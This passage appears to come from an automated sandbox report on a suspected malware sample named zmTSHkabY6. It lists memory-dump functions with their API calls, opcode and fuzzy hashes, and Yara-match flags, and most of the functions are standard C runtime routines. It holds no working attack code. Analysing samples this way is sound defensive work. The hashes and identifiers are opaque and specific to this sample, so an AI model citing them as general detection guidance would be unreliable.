                                                                    • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                    • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                                                    Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                                    • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                                    • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                                    • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                                    Function 00E95CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E8FE6F: _free.LIBCMT ref: 00E8FE7D
                                                                      • Part of subcall function 00E9375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00E988CA,?,?,?,00000000,?,00E98639,0000FDE9,00000000,?), ref: 00E93800
                                                                    • GetLastError.KERNEL32 ref: 00E95D18
                                                                    • __dosmaperr.LIBCMT ref: 00E95D1F
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E95D5E
                                                                    • __dosmaperr.LIBCMT ref: 00E95D65
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                    • String ID:
                                                                    • API String ID: 167067550-0
                                                                    • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                                    • Instruction ID: 20d1ea19af337c6512b2befee1c79d82c9c9fe2e459edadd72170d5e39098176
                                                                    • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                                    • Instruction Fuzzy Hash: BE21C5B2600A05BFDF21AF758C8496BB7ACEF053687109519F81AB7150E731ED4087A0
                                                                    Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                                      • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                                    • GetLastError.KERNEL32 ref: 00415AB1
                                                                    • __dosmaperr.LIBCMT ref: 00415AB8
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                                    • __dosmaperr.LIBCMT ref: 00415AFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                    • String ID:
                                                                    • API String ID: 167067550-0
                                                                    • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                    • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                                    • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                    • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                                    Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                                    • GetLastError.KERNEL32 ref: 10007C36
                                                                    • __dosmaperr.LIBCMT ref: 10007C3D
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                                    • __dosmaperr.LIBCMT ref: 10007C83
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                    • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                                    • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                    • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                                    Function 10008336 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                    • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                                    • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                    • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                                    Function 00E91DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction ID: 27459168c497e94a82b8ae262e9544a202b9925d8764133dd3c69d93dd75e736
                                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                    • Instruction Fuzzy Hash: 3921E771E01223ABCF319B249C84B9E7768AF52BE4F2525A1FD16B7290D630DC01C6E4
                                                                    Function 00E91464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00E8213F,?,00E82143,00E8C610,?,00E8213F,0041D0A0,?,00E91714,00000000,0041D0A0,00000000,00000000,00E8213F), ref: 00E91469
                                                                    • _free.LIBCMT ref: 00E914C6
                                                                    • _free.LIBCMT ref: 00E914FC
                                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E91714,00000000,0041D0A0,00000000,00000000,00E8213F), ref: 00E91507
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                    • Instruction ID: 082e578335d1c86adf61668380d17cae181f920845b80840df14350165fbe028
                                                                    • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                    • Instruction Fuzzy Hash: D21129327002073BDF2123B45D86D7A26D98BC4379F6536B8F638B61E2DF258C119115
                                                                    Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,74DEDF80,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 00411202
                                                                    • _free.LIBCMT ref: 0041125F
                                                                    • _free.LIBCMT ref: 00411295
                                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 004112A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                    • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                                    • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                    • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                                    Function 00E915BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00E8C5A5,00E92748,?,?,00E8A3C2,?,?,?,00E81353,?,00E8370E,?,?), ref: 00E915C0
                                                                    • _free.LIBCMT ref: 00E9161D
                                                                    • _free.LIBCMT ref: 00E91653
                                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E8A3C2,?,?,?,00E81353,?,00E8370E,?,?,?), ref: 00E9165E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                    • Instruction ID: 09c329d56c63389975c5143b54f167817b5cd6dc4ddc51b69f610a41e3bd64d0
                                                                    • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                    • Instruction Fuzzy Hash: 28110832B042023BDF2227B96D86D7A26998BC1378F6633B9F524F21E2DF658C11A115
                                                                    Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                                    • _free.LIBCMT ref: 004113B6
                                                                    • _free.LIBCMT ref: 004113EC
                                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                    • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                                    • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                    • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                                    Function 00E8C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E8C13F,?,?,0042B000,00000000,?,00E8C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 00E8C10E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction ID: 388013442dc53b1590f8325c4fb68bb087b49e3e230b81c00a208426b7407c52
                                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                    • Instruction Fuzzy Hash: 5611A731E41221EBDB226B689C8579A77A4AF077A4F355121FD1DB72C0D670ED0087F4
                                                                    Function 00E9B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000), ref: 00E9B0A0
                                                                    • GetLastError.KERNEL32(?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000,00000000,?,00E98863,?), ref: 00E9B0AC
                                                                      • Part of subcall function 00E9B072: CloseHandle.KERNEL32(0042A930,00E9B0BC,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000,00000000), ref: 00E9B082
                                                                    • ___initconout.LIBCMT ref: 00E9B0BC
                                                                      • Part of subcall function 00E9B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,00E9B063,00E9AD23,00000000,?,00E9830F,00000000,00000000,00000000,00000000), ref: 00E9B047
                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00E9AD36,00000000,00000001,00000000,00000000,?,00E9830F,00000000,00000000,00000000,00000000), ref: 00E9B0D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction ID: 816d2042dea4285ee948de37c6c093a3822e10da244b8e347f577633e8616e90
                                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction Fuzzy Hash: B8F01C36911214FBCF222F91ED0899E7F66EF487A4F054420FE1DA6130C7328961DB95
                                                                    Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                                    • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                                      • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                                    • ___initconout.LIBCMT ref: 0041AE55
                                                                      • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                                    • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                                    Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                                    • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                                      • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                                    • ___initconout.LIBCMT ref: 1000CD55
                                                                      • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                    • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                                    • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                                    • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                                    Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                                    • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                                    • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                    • String ID:
                                                                    • API String ID: 3269011525-0
                                                                    • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                    • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                                    • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                                    • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                                    Function 00E90CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00E90CB6
                                                                      • Part of subcall function 00E91D29: HeapFree.KERNEL32(00000000,00000000,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?), ref: 00E91D3F
                                                                      • Part of subcall function 00E91D29: GetLastError.KERNEL32(?,?,00E972DB,?,00000000,?,?,?,00E97302,?,00000007,?,?,00E975E1,?,?), ref: 00E91D51
                                                                    • _free.LIBCMT ref: 00E90CC9
                                                                    • _free.LIBCMT ref: 00E90CDA
                                                                    • _free.LIBCMT ref: 00E90CEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                    • Instruction ID: 973d7f9ccff552480a639f6d20c6960ab9a3f9bb8ad151951851a3125ff1e35c
                                                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                                    • Instruction Fuzzy Hash: A7E0EC79A133359A8A366F14BD41449FFA9EBD8B113862476F42022231C7320553DBCF
                                                                    Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00410A4F
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    • _free.LIBCMT ref: 00410A62
                                                                    • _free.LIBCMT ref: 00410A73
                                                                    • _free.LIBCMT ref: 00410A84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                    • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                                    • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                                    • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                                    Function 0040F8ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                    • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                                    • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                                    • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                                    Function 00E903E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
